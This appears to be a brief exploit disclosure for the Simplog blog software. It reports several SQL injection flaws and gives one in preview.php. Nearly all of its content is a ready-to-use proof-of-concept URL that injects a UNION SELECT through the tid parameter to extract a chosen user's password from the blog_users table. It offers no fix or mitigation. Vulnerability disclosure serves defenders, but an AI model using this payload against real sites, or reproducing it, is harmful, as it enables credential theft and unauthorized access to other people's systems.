Softare: Simplog 
version: (i assume others as well)

There are a few sql injections available with this software.  This one is in preview.php


http://site/preview.php?blogid=2&adm=tem&tid=-1%20union%20select%20password%20from%20blog_users%20where%20name='[insert username here]' 

